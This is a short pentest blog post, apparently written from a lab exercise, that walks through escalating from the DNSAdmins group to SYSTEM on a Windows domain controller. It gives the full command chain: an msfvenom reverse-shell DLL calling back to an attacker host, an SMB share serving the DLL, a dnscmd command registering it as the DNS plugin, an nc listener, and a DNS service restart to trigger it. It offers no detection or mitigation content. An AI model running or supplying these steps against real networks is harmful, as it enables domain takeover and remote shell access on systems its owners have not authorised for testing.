coverImage

Windows Privilege Escalation DNSAdmin to Domain Admin DLL Injection.

avatar

Udesh

· 2 Min

Hi everyone, today I will be writing about a privilege escalation technique that I used in a recent pentest. This technique is a bit different from the usual ones and I thought it would be a good idea to share it with you all.

Introduction

DNSAdmin to Domain Admin DLL Injection is a privilege escalation technique that exploits a vulnerability in the Windows DNS service. By leveraging the permissions granted to users in the DNSAdmins group, an attacker can inject a malicious DLL into the DNS service, which runs under the SYSTEM context on a Domain Controller. This allows the attacker to gain SYSTEM-level privileges, effectively becoming a Domain Admin.

How it Works:

  1. Compromise a DNSAdmin User: The attacker gains access to a user account that is a member of the DNSAdmins group.
  2. Create a Malicious DLL: The attacker develops a DLL that contains malicious code designed to execute with SYSTEM privileges.
  3. Inject the DLL: The attacker uses the DNSAdmin permissions to inject the malicious DLL into the DNS service.
  4. Trigger the Payload: The attacker triggers the payload by restarting the DNS service, causing the malicious DLL to execute with SYSTEM privileges.

Prepping

First, let's check if our user is part of the DNSAdmins group:

type the following command in the command prompt:

C:\>whoami /all
DNSAdmin group

As you can see, our user is already in the DNSAdmins group.(MEGABANK\DnsAdmins)

Creating & Serving the Malicious DLL

Now, we need to prepare a DLL that will be used as the serverlevelplugindll. We'll use the msfvenom tool for this.

$msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.X LPORT=4444 --platform=windows -f dll > ~/Desktop/plugin.dll

Next, let's use Impacket's smbserver.py to serve this DLL file in to the victim machine.

$ sudo python smbserver.py -debug SHARE /home/kali/share

Injecting the DLL

Now, we need to inject the malicious DLL into the DNS service. We can do this using the dnscmd tool.

C:\>dnscmd.exe BANK.local /config /serverlevelplugindll \\10.10.10.X\SHARE\plugin.dll

Before you continue, make sure you have started your listener on the attacking machine to catch the reverse shell.

$ nc -nlvp 4444

Triggering the Payload

To trigger the payload, we need to restart the DNS service. We can do this using the following command:

$ sc.exe stop dns
$ sc.exe start dns

If everything goes well, you should receive a reverse shell on your attacking machine. 😎